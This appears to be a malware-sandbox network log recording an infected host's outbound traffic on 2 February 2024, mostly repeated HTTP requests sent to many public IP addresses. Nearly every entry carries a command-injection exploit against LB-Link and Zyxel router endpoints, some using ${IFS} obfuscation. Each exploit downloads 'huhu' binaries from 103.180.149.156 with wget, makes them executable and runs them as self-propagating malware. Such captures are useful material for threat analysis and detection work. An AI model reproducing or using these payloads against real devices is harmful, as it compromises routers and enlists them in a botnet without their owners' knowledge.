                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7835192.168.2.1449412210.223.214.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.524959087 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:25.026669025 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:26.758671045 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:30.406409025 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7836192.168.2.145448214.95.52.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.524997950 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:23.810350895 CET103INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain
                                                        Content-Length: 30
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7837192.168.2.1458902107.178.151.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.637655973 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7838192.168.2.1449304125.88.187.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.978354931 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7839192.168.2.143868479.210.50.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221134901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7840192.168.2.143864260.7.166.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221163034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7841192.168.2.143826019.8.217.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221223116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7842192.168.2.1451448135.171.51.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221272945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7843192.168.2.144822624.241.226.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221297026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7844192.168.2.145393040.200.190.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221355915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7845192.168.2.1439576126.7.239.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221391916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7846192.168.2.1453690203.113.122.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221430063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7847192.168.2.14335742.148.20.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221478939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7848192.168.2.1439626165.228.190.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221534014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7849192.168.2.1451360159.230.106.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221571922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7850192.168.2.144353485.222.171.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221601009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7851192.168.2.144235862.128.249.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221647024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7852192.168.2.1443488150.72.47.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221704960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7853192.168.2.1449016112.50.33.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221714020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7854192.168.2.145016825.186.159.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221743107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7855192.168.2.1439570186.130.151.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221779108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7856192.168.2.143470890.251.115.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221841097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7857192.168.2.1457548218.161.71.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221868038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7858192.168.2.143439269.25.120.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221923113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7859192.168.2.1448824145.75.248.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.221963882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7860192.168.2.145126671.236.107.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222008944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7861192.168.2.145953239.53.124.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222060919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7862192.168.2.1439616171.48.173.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222094059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7863192.168.2.146042845.204.53.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222121954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7864192.168.2.1440076125.101.41.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222198963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7865192.168.2.1442750185.96.229.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222225904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7866192.168.2.143946684.210.29.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222266912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7867192.168.2.145433814.255.81.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222300053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7868192.168.2.1436072140.20.6.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222356081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7869192.168.2.143532474.210.181.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222395897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7870192.168.2.145885460.246.8.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222443104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7871192.168.2.143755668.233.72.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222476006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7872192.168.2.1452194115.11.112.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222513914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7873192.168.2.1441970220.163.234.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222578049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7874192.168.2.145134064.205.27.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222600937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7875192.168.2.1438884148.27.166.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222660065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7876192.168.2.1436636160.205.167.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222693920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7877192.168.2.145474625.99.250.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222732067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7878192.168.2.144929699.217.114.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222780943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7879192.168.2.1435708203.30.146.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222832918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7880192.168.2.1456296157.9.205.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222867966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7881192.168.2.1435810158.84.132.189443
                                                        TimestampBytes transferredDirectionData
